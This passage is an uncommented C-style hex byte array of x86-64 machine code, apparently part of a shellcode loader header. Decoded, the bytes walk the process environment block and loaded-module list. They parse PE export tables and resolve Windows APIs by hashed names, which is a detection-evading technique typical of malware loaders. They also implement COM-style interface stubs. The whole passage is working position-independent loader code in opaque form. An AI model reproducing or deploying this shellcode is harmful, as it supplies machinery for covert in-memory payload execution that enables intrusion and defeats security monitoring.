929 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
930 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48,
931 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
932 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b,
933 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
934 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
935 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc,
936 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48,
937 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
938 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00,
939 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca,
940 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30,
941 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
942 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
943 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91,
944 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48,
945 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8,
946 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00,
947 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28,
948 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41,
949 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00,
950 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
951 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
952 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d,
953 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b,
954 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10,
955 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8,
956 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48,
957 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b,
958 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
959 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48,
960 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
961 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
962 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0,
963 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
964 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc,
965 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89,
966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d,
967 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48,
968 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
969 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
970 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c,
971 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03,
972 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
973 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10,
974 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45,
975 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10,
976 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
977 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
978 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48,
979 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b,
980 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b,
981 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0,
982 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
983 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
984 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
985 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48,
986 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10,
987 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50,
988 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54,
989 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48,
990 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10,
991 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60,
992 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
993 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
994 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
995 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
996 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
997 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
998 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
999 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1000 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66,
1001 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1002 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
1003 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00,
1004 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18,
1005 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00,
1006 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
1007 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1008 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1009 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1010 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1011 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1012 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1013 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1014 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1015 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1016 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1017 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8,
1018 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1019 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89,
1020 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1021 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1022 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1023 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1024 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1025 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1026 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1027 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1028 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0,
1029 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
1030 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1031 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1032 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1033 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1034 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1035 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1036 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60,
1037 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
1038 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00,
1039 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08,
1040 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00,
1041 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
1042 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b,
1043 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1044 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
1045 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48,
1046 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
1047 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4,
1048 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1049 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b,
1050 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8,
1051 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
1052 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00,
1053 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03,
1054 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c,
1055 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1056 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01,
1057 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01,
1058 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00,
1059 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2,
1060 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1061 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1062 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1063 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85,
1064 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95,
1065 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48,
1066 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85,
1067 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01,
1068 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1069 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1070 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60,
1071 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60,
1072 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80,
1073 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01,
1074 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1075 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
1076 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1077 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00,
1078 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce,
1079 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b,
1080 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1081 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
1082 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1083 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00,
1084 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1085 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48,
1086 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1087 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f,
1088 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00,
1089 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1090 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86,
1091 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
1092 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00,
1093 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
1094 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1095 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b,
1096 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00,
1097 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85,
1098 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48,
1099 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1100 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76,
1101 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1102 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01,
1103 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c,
1104 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6,
1105 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1106 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01,
1107 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01,
1108 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1109 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1110 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc,
1111 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00,
1112 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1113 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
1114 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85,
1115 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85,
1116 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20,
1117 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
1118 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b,
1119 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55,
1120 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
1121 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01,
1122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00,
1123 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd,
1124 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01,
1125 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85,
1126 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d,
1127 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1128 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45,
1129 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00,
1130 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48,
1131 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1132 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48,
1133 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45,
1134 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55,
1135 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
1136 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48,
1137 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
1138 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48,
1139 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1140 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1141 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1142 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1143 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1144 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3,
1145 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1146 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30,
1147 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1148 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b,
1149 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1150 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45,
1151 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1152 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45,
1153 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00,
1154 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1155 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00,
